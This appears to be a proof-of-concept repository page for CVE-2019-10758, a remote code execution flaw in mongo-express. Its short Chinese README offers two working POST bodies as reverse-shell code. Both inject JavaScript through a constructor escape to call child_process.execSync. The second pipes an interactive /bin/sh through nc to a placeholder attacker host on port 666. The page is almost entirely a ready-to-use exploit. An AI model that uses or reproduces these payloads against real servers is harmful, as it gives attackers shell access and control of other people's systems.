CVE-2019-10758 PoC — mongo-express 安全漏洞

Source

Associated Vulnerability

Description

CVE-2019-10758

Readme

# CVE-2019-10758
mongo-express远程代码执行，反弹shell代码如下：

POST BODY 1:

document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("mkfifo /tmp/f")

POST BODY 2：

document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("cat /tmp/f | /bin/sh -i 2>%261 | nc x.x.x.x 666 >/tmp/f")

File Snapshot

 [4.0K]  /data/pocs/ab3e4b0f68f404c62ac3b02f55fd8c178cb9d79b
└── [ 392]  README.md

0 directories, 1 file

Remarks